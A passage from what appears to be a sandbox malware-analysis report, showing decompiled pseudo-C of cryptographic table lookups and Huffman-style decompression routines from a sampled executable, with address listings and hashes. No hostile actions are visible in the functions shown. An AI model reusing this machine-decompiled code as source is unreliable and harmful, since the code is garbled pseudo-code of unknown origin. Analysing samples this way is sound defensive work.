								_t374 =  *(0xd069c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0xd061c8 + (_t423 & 0x000000ff) * 4);
								_t132 = _t431 + 0x20;
								 *_t132 =  *(_t431 + 0x20) - 1;
								 *(_t431 + 0x48) = _t374;
							} while ( *_t132 != 0);
							 *(_t431 + 0x1c) = _t409;
							_t408 =  *(_t431 + 0x74);
							 *(_t431 + 0x10) = _t426;
							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
							 *(_t431 + 0x18) = _t374;
							L9:
							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
							 *(_t431 + 0x20) = _t252;
							 *(_t431 + 0x4c) = _t252;
							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0xd050c8));
							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0xd050c8));
							_t415 =  *(_t431 + 0x20);
							 *(_t431 + 0x54) = _t399;
							 *(_t431 + 0x50) = _t348;
							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0xd050c8));
							 *(_t431 + 0x58) = _t376;
							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0xd050c8));
							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0xd050c8));
							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0xd050c8));
							_t416 = _t415 >> 0x18;
							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0xd050c8));
							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0xd050c8));
							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0xd050c8));
							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0xd050c8));
							_t186 = _t416 + 0xd050c8; // 0x30d56a09
							 *((char*)(_t431 + 0x4b)) =  *_t186;
							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
							 *(_t431 + 0x20) = _t300;
							if( *((char*)(_t425 + 1)) != 0) {
								_t402 = _t402 ^  *(_t431 + 0x5c);
								_t418 = _t418 ^  *(_t431 + 0x60);
								_t351 = _t351 ^  *(_t431 + 0x64);
								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
							}
							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
							_t303 =  *(_t431 + 0x24);
							 *(_t431 + 0x60) =  *(_t303 - 4);
							 *(_t431 + 0x64) =  *_t303;
							 *(_t431 + 0x68) = _t303[1];
							_t380 =  *(_t431 + 0x28);
							 *(_t431 + 0x24) =  &(_t303[4]);
							 *(_t380 - 8) = _t402;
							_t380[1] =  *(_t431 + 0x20);
							_t394 =  *((intOrPtr*)(_t431 + 0x34));
							 *(_t380 - 4) = _t418;
							 *_t380 = _t351;
							_t357 =  &(_t380[4]);
							_t408 = _t408 - 1;
							 *(_t431 + 0x28) = _t357;
							 *(_t431 + 0x74) = _t408;
						} while (_t408 != 0);
						goto L13;
					}
					return E00CCEE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
				}
				return _t220;
			}










































                                                    0x00cce9bc
                                                    0x00cce9c0
                                                    0x00cce9c2
                                                    0x00cce9c8
                                                    0x00cce9ce
                                                    0x00cce9d5
                                                    0x00cce9d9
                                                    0x00cce9f4
                                                    0x00cce9fd
                                                    0x00ccea02
                                                    0x00ccea07
                                                    0x00ccee5f
                                                    0x00000000
                                                    0x00ccee6f
                                                    0x00ccea0d
                                                    0x00ccea16
                                                    0x00ccea1a
                                                    0x00ccea20
                                                    0x00ccea23
                                                    0x00ccea27
                                                    0x00ccea2a
                                                    0x00ccea2e
                                                    0x00ccea2e
                                                    0x00ccea35
                                                    0x00ccea48
                                                    0x00ccea4d
                                                    0x00ccea73
                                                    0x00ccea77
                                                    0x00ccea82
                                                    0x00ccea89
                                                    0x00ccea8d
                                                    0x00ccea94
                                                    0x00cceaba
                                                    0x00cceac6
                                                    0x00cceaca
                                                    0x00ccead8
                                                    0x00cceae3
                                                    0x00cceafa
                                                    0x00cceb06
                                                    0x00cceb0a
                                                    0x00cceb21
                                                    0x00cceb36
                                                    0x00cceb3d
                                                    0x00cceb40
                                                    0x00cceb44
                                                    0x00cceb4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cceb51
                                                    0x00cceb5b
                                                    0x00cceb5d
                                                    0x00cceb62
                                                    0x00cceb66
                                                    0x00cceb6a
                                                    0x00cceb71
                                                    0x00cceb75
                                                    0x00cceb81
                                                    0x00cceb85
                                                    0x00cceb87
                                                    0x00ccebbc
                                                    0x00ccebdc
                                                    0x00ccebf6
                                                    0x00ccec19
                                                    0x00ccec36
                                                    0x00ccec3d
                                                    0x00ccec41
                                                    0x00ccec70
                                                    0x00ccec73
                                                    0x00ccec77
                                                    0x00ccec7e
                                                    0x00ccec7e
                                                    0x00ccec83
                                                    0x00ccec83
                                                    0x00ccec8d
                                                    0x00ccec91
                                                    0x00ccec95
                                                    0x00ccec99
                                                    0x00ccec9d
                                                    0x00cceca1
                                                    0x00cceca4
                                                    0x00cceca8
                                                    0x00ccecac
                                                    0x00ccecb6
                                                    0x00ccecc3
                                                    0x00cceccf
                                                    0x00ccecd6
                                                    0x00ccece0
                                                    0x00ccecec
                                                    0x00ccecf0
                                                    0x00ccecf4
                                                    0x00ccecfe
                                                    0x00cced07
                                                    0x00cced11
                                                    0x00cced1e
                                                    0x00cced30
                                                    0x00cced42
                                                    0x00cced51
                                                    0x00cced61
                                                    0x00cced76
                                                    0x00cced82
                                                    0x00cced8b
                                                    0x00cced9a
                                                    0x00cceda7
                                                    0x00ccedb1
                                                    0x00ccedbb
                                                    0x00ccedc8
                                                    0x00ccedcc
                                                    0x00ccedd2
                                                    0x00cceddf
                                                    0x00ccede3
                                                    0x00ccede7
                                                    0x00ccedef
                                                    0x00ccedf3
                                                    0x00ccedf5
                                                    0x00ccedf9
                                                    0x00ccedfd
                                                    0x00ccee05
                                                    0x00ccee05
                                                    0x00ccee0f
                                                    0x00ccee13
                                                    0x00ccee1a
                                                    0x00ccee20
                                                    0x00ccee2a
                                                    0x00ccee2e
                                                    0x00ccee32
                                                    0x00ccee36
                                                    0x00ccee3d
                                                    0x00ccee40
                                                    0x00ccee44
                                                    0x00ccee47
                                                    0x00ccee49
                                                    0x00ccee4c
                                                    0x00ccee4f
                                                    0x00ccee53
                                                    0x00ccee53
                                                    0x00000000
                                                    0x00ccee5e
                                                    0x00000000
                                                    0x00cce9e4
                                                    0x00ccee77

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26a8dd36336a707e068e9f74afd4239eb0b2051b1b3d6d887f634067d5cce4b3
                                                    • Instruction ID: ec66eb155e3c13712036ee14e0958eab93a223787c2a62ba54d81ffba5ee5f88
                                                    • Opcode Fuzzy Hash: 26a8dd36336a707e068e9f74afd4239eb0b2051b1b3d6d887f634067d5cce4b3
                                                    • Instruction Fuzzy Hash: 2DE128755083948FC304CF29D89096ABFF0AF9A310F45495EF9D897392C235EA19DFA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD4088 Relevance: .3, Instructions: 270COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00CD4088(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t121;
				signed int _t130;
				signed int _t139;
				signed int _t140;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr* _t158;
				intOrPtr* _t167;
				signed int _t170;
				void* _t171;
				signed int _t174;
				void* _t179;
				unsigned int _t181;
				void* _t184;
				signed int _t185;
				intOrPtr* _t186;
				void* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t193;
				signed int _t198;
				void* _t201;

				_t179 = __edx;
				_t187 = __ecx;
				_t186 = __ecx + 4;
				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E00CD4DC4(__ecx) != 0) {
					E00CCA881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
					_t82 = E00CCA898(_t186);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t139 = 0;
						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00CDFFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00CCA881(_t186, 2);
						do {
							 *(_t201 + 0x14) = E00CCA898(_t186) >> 0xc;
							E00CCA881(_t186, 4);
							_t87 =  *(_t201 + 0x10);
							__eflags = _t87 - 0xf;
							if(_t87 != 0xf) {
								 *(_t201 + _t139 + 0x14) = _t87;
								goto L15;
							}
							_t188 = E00CCA898(_t186) >> 0x0000000c & 0x000000ff;
							E00CCA881(_t186, 4);
							__eflags = _t188;
							if(_t188 != 0) {
								_t189 = _t188 + 2;
								__eflags = _t189;
								while(1) {
									_t189 = _t189 - 1;
									__eflags = _t139 - 0x14;
									if(_t139 >= 0x14) {
										break;
									}
									 *(_t201 + _t139 + 0x14) = 0;
									_t139 = _t139 + 1;
									__eflags = _t189;
									if(_t189 != 0) {
										continue;
									}
									break;
								}
								_t139 = _t139 - 1;
								goto L15;
							}
							 *(_t201 + _t139 + 0x14) = 0xf;
							L15:
							_t139 = _t139 + 1;
							__eflags = _t139 - 0x14;
						} while (_t139 < 0x14);
						_push(0x14);
						_t190 = _t187 + 0x3c50;
						_push(_t190);
						_push(_t201 + 0x1c);
						E00CD3797();
						_t140 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
								L19:
								_t92 = E00CCA89D(_t186);
								_t93 =  *(_t190 + 0x84);
								_t181 = _t92 & 0x0000fffe;
								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
									_t149 = 0xf;
									_t94 = _t93 + 1;
									 *(_t201 + 0x10) = _t149;
									__eflags = _t94 - _t149;
									if(_t94 >= _t149) {
										L27:
										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
										 *_t186 =  *_t186 + (_t151 >> 3);
										_t97 =  *(_t201 + 0x10);
										 *(_t186 + 4) = _t151 & 0x00000007;
										_t153 = 0x10;
										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
										__eflags = _t156 -  *_t190;
										asm("sbb eax, eax");
										_t98 = _t97 & _t156;
										__eflags = _t98;
										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
										L28:
										_t184 = 0x10;
										__eflags = _t157 - _t184;
										if(_t157 >= _t184) {
											_t99 = 0x12;
											__eflags = _t157 - _t99;
											if(__eflags >= 0) {
												_t158 = _t186;
												if(__eflags != 0) {
													_t193 = (E00CCA898(_t158) >> 9) + 0xb;
													__eflags = _t193;
													_push(7);
												} else {
													_t193 = (E00CCA898(_t158) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t101);
												E00CCA881(_t186, _t101);
												while(1) {
													_t193 = _t193 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) = 0;
													_t140 = _t140 + 1;
													__eflags = _t193;
													if(_t193 != 0) {
														continue;
													}
													L44:
													_t190 = _t187 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t157 - _t184;
											_t167 = _t186;
											if(_t157 != _t184) {
												_t198 = (E00CCA898(_t167) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00CCA898(_t167) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t121);
											E00CCA881(_t186, _t121);
											__eflags = _t140;
											if(_t140 == 0) {
												goto L47;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
													_t140 = _t140 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
										_t140 = _t140 + 1;
										goto L45;
									}
									_t170 = 4 + _t94 * 4 + _t190;
									__eflags = _t170;
									while(1) {
										__eflags = _t181 -  *_t170;
										if(_t181 <  *_t170) {
											break;
										}
										_t94 = _t94 + 1;
										_t170 = _t170 + 4;
										__eflags = _t94 - 0xf;
										if(_t94 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t94;
									goto L27;
								}
								_t171 = 0x10;
								_t185 = _t181 >> _t171 - _t93;
								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t174 >> 3);
								 *(_t186 + 4) = _t174 & 0x00000007;
								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
								goto L28;
							}
							_t130 = E00CD4DC4(_t187);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t140 - 0x194;
						} while (_t140 < 0x194);
						L46:
						 *((char*)(_t187 + 0xe661)) = 1;
						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
							_push(0x12b);
							_push(_t187 + 0xa0);
							_push(_t201 + 0x30);
							E00CD3797();
							_push(0x3c);
							_push(_t187 + 0xf8c);
							_push(_t201 + 0x15b);
							E00CD3797();
							_push(0x11);
							_push(_t187 + 0x1e78);
							_push(_t201 + 0x197);
							E00CD3797();
							_push(0x1c);
							_push(_t187 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00CD3797();
							E00CE0320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
							return 1;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
					return E00CD2F75(_t179, _t205, _t187, _t187 + 0xe4c4);
				} else {
					L47:
					return 0;
				}
			}







































                                                    0x00cd4088
                                                    0x00cd4091
                                                    0x00cd409a
                                                    0x00cd40a2
                                                    0x00cd40bc
                                                    0x00cd40c3
                                                    0x00cd40c8
                                                    0x00cd40cd
                                                    0x00cd40f1
                                                    0x00cd40f3
                                                    0x00cd40f9
                                                    0x00cd40ff
                                                    0x00cd4105
                                                    0x00cd410a
                                                    0x00cd4119
                                                    0x00cd411e
                                                    0x00cd411e
                                                    0x00cd4125
                                                    0x00cd412a
                                                    0x00cd4138
                                                    0x00cd413c
                                                    0x00cd4141
                                                    0x00cd4145
                                                    0x00cd4147
                                                    0x00cd4180
                                                    0x00000000
                                                    0x00cd4180
                                                    0x00cd4157
                                                    0x00cd415a
                                                    0x00cd415f
                                                    0x00cd4161
                                                    0x00cd416a
                                                    0x00cd416a
                                                    0x00cd416d
                                                    0x00cd416d
                                                    0x00cd416e
                                                    0x00cd4171
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4173
                                                    0x00cd4178
                                                    0x00cd4179
                                                    0x00cd417b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd417b
                                                    0x00cd417d
                                                    0x00000000
                                                    0x00cd417d
                                                    0x00cd4163
                                                    0x00cd4184
                                                    0x00cd4184
                                                    0x00cd4185
                                                    0x00cd4185
                                                    0x00cd418a
                                                    0x00cd418c
                                                    0x00cd4194
                                                    0x00cd4199
                                                    0x00cd419a
                                                    0x00cd419f
                                                    0x00cd419f
                                                    0x00cd41a1
                                                    0x00cd41aa
                                                    0x00cd41ac
                                                    0x00cd41bd
                                                    0x00cd41bf
                                                    0x00cd41c6
                                                    0x00cd41cc
                                                    0x00cd41d2
                                                    0x00cd41d6
                                                    0x00cd4203
                                                    0x00cd4204
                                                    0x00cd4205
                                                    0x00cd4209
                                                    0x00cd420b
                                                    0x00cd4229
                                                    0x00cd422c
                                                    0x00cd4238
                                                    0x00cd423a
                                                    0x00cd423e
                                                    0x00cd4243
                                                    0x00cd4250
                                                    0x00cd4252
                                                    0x00cd4255
                                                    0x00cd4257
                                                    0x00cd4257
                                                    0x00cd4259
                                                    0x00cd4261
                                                    0x00cd4263
                                                    0x00cd4264
                                                    0x00cd4267
                                                    0x00cd4280
                                                    0x00cd4281
                                                    0x00cd4284
                                                    0x00cd42d2
                                                    0x00cd42d4
                                                    0x00cd42f1
                                                    0x00cd42f1
                                                    0x00cd42f4
                                                    0x00cd42d6
                                                    0x00cd42e0
                                                    0x00cd42e3
                                                    0x00cd42e3
                                                    0x00cd42f6
                                                    0x00cd42fa
                                                    0x00cd42ff
                                                    0x00cd42ff
                                                    0x00cd4300
                                                    0x00cd4306
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4308
                                                    0x00cd430d
                                                    0x00cd430e
                                                    0x00cd4310
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4312
                                                    0x00cd4312
                                                    0x00000000
                                                    0x00cd4312
                                                    0x00000000
                                                    0x00cd42ff
                                                    0x00cd4286
                                                    0x00cd4289
                                                    0x00cd428b
                                                    0x00cd42a8
                                                    0x00cd42a8
                                                    0x00cd42ab
                                                    0x00cd428d
                                                    0x00cd4297
                                                    0x00cd429a
                                                    0x00cd429a
                                                    0x00cd42ad
                                                    0x00cd42b1
                                                    0x00cd42b6
                                                    0x00cd42b8
                                                    0x00000000
                                                    0x00cd42ba
                                                    0x00cd42ba
                                                    0x00cd42ba
                                                    0x00cd42bb
                                                    0x00cd42c1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd42c7
                                                    0x00cd42cb
                                                    0x00cd42cc
                                                    0x00cd42ce
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd42d0
                                                    0x00000000
                                                    0x00cd42ba
                                                    0x00cd42b8
                                                    0x00cd4274
                                                    0x00cd4278
                                                    0x00000000
                                                    0x00cd4278
                                                    0x00cd4214
                                                    0x00cd4214
                                                    0x00cd4216
                                                    0x00cd4216
                                                    0x00cd4218
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd421a
                                                    0x00cd421b
                                                    0x00cd421e
                                                    0x00cd4221
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4223
                                                    0x00cd4225
                                                    0x00000000
                                                    0x00cd4225
                                                    0x00cd41da
                                                    0x00cd41dd
                                                    0x00cd41e7
                                                    0x00cd41ef
                                                    0x00cd41f4
                                                    0x00cd41f7
                                                    0x00000000
                                                    0x00cd41f7
                                                    0x00cd41b0
                                                    0x00cd41b5
                                                    0x00cd41b7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4318
                                                    0x00cd4318
                                                    0x00cd4318
                                                    0x00cd4324
                                                    0x00cd4326
                                                    0x00cd432d
                                                    0x00cd4333
                                                    0x00cd4339
                                                    0x00cd4346
                                                    0x00cd434b
                                                    0x00cd434c
                                                    0x00cd4351
                                                    0x00cd435b
                                                    0x00cd4363
                                                    0x00cd4364
                                                    0x00cd4369
                                                    0x00cd4373
                                                    0x00cd437b
                                                    0x00cd437c
                                                    0x00cd4381
                                                    0x00cd438b
                                                    0x00cd4393
                                                    0x00cd4394
                                                    0x00cd43aa
                                                    0x00000000
                                                    0x00cd43b2
                                                    0x00000000
                                                    0x00cd4333
                                                    0x00cd40d5
                                                    0x00000000
                                                    0x00cd4335
                                                    0x00cd4335
                                                    0x00000000
                                                    0x00cd4335

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                    • Instruction ID: ae8b1a342f7841b3e35451c7bde938ed2b53b82941bd6f8fc60a1bdaa7945338
                                                    • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                    • Instruction Fuzzy Hash: 789145B02003499BDB2CEF68D899BBE77D5EB60304F10092EE796873C2DB749646D352
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD43BF Relevance: .2, Instructions: 243COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00CD43BF(void* __ecx) {
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				char _t90;
				signed int _t94;
				void* _t97;
				signed int _t108;
				unsigned int _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				signed int _t134;
				signed int _t136;
				void* _t138;
				signed int _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t147;
				intOrPtr* _t153;
				intOrPtr* _t156;
				void* _t157;
				signed int _t160;
				unsigned int _t165;
				void* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t175;
				void* _t177;
				void* _t178;

				_t177 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
					__eflags =  *((char*)(_t175 + 8));
					if( *((char*)(_t175 + 8)) != 0) {
						L5:
						_t171 = 0;
						__eflags = 0;
						do {
							_t112 = E00CCA898(_t175) >> 0xc;
							E00CCA881(_t175, 4);
							__eflags = _t112 - 0xf;
							if(_t112 != 0xf) {
								 *(_t178 + _t171 + 0x18) = _t112;
								goto L14;
							}
							_t127 = E00CCA898(_t175) >> 0x0000000c & 0x000000ff;
							E00CCA881(_t175, 4);
							__eflags = _t127;
							if(_t127 != 0) {
								_t128 = _t127 + 2;
								__eflags = _t128;
								while(1) {
									_t128 = _t128 - 1;
									__eflags = _t171 - 0x14;
									if(_t171 >= 0x14) {
										break;
									}
									 *(_t178 + _t171 + 0x18) = 0;
									_t171 = _t171 + 1;
									__eflags = _t128;
									if(_t128 != 0) {
										continue;
									}
									break;
								}
								_t171 = _t171 - 1;
								goto L14;
							}
							 *(_t178 + _t171 + 0x18) = 0xf;
							L14:
							_t171 = _t171 + 1;
							__eflags = _t171 - 0x14;
						} while (_t171 < 0x14);
						_push(0x14);
						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
						_push(_t114);
						_push(_t178 + 0x18);
						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
						E00CD3797();
						_t172 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t175 + 8));
							if( *((char*)(_t175 + 8)) != 0) {
								L19:
								_t70 = E00CCA89D(_t175);
								_t71 =  *(_t114 + 0x84);
								_t165 = _t70 & 0x0000fffe;
								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
									_t134 = 0xf;
									_t72 = _t71 + 1;
									 *(_t178 + 0x10) = _t134;
									__eflags = _t72 - _t134;
									if(_t72 >= _t134) {
										L27:
										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
										 *_t175 =  *_t175 + (_t136 >> 3);
										_t75 =  *(_t178 + 0x10);
										 *(_t175 + 4) = _t136 & 0x00000007;
										_t138 = 0x10;
										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
										__eflags = _t141 -  *_t114;
										asm("sbb eax, eax");
										_t76 = _t75 & _t141;
										__eflags = _t76;
										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
										L28:
										_t142 = 0x10;
										__eflags = _t77 - _t142;
										if(_t77 >= _t142) {
											_t168 = 0x12;
											__eflags = _t77 - _t168;
											if(__eflags >= 0) {
												_t143 = _t175;
												if(__eflags != 0) {
													_t117 = (E00CCA898(_t143) >> 9) + 0xb;
													__eflags = _t117;
													_push(7);
												} else {
													_t117 = (E00CCA898(_t143) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t79);
												E00CCA881(_t175, _t79);
												while(1) {
													_t117 = _t117 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) = 0;
													_t172 = _t172 + 1;
													__eflags = _t117;
													if(_t117 != 0) {
														continue;
													}
													L44:
													_t114 =  *((intOrPtr*)(_t178 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t77 - _t142;
											_t153 = _t175;
											if(_t77 != _t142) {
												_t124 = (E00CCA898(_t153) >> 9) + 0xb;
												__eflags = _t124;
												_push(7);
											} else {
												_t124 = (E00CCA898(_t153) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t97);
											E00CCA881(_t175, _t97);
											__eflags = _t172;
											if(_t172 == 0) {
												L48:
												_t90 = 0;
												L50:
												return _t90;
											} else {
												while(1) {
													_t124 = _t124 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
													_t172 = _t172 + 1;
													__eflags = _t124;
													if(_t124 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t178 + _t172 + 0x2c) = _t77;
										_t172 = _t172 + 1;
										goto L45;
									}
									_t156 = _t114 + (_t72 + 1) * 4;
									while(1) {
										__eflags = _t165 -  *_t156;
										if(_t165 <  *_t156) {
											break;
										}
										_t72 = _t72 + 1;
										_t156 = _t156 + 4;
										__eflags = _t72 - 0xf;
										if(_t72 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t178 + 0x10) = _t72;
									goto L27;
								}
								_t157 = 0x10;
								_t169 = _t165 >> _t157 - _t71;
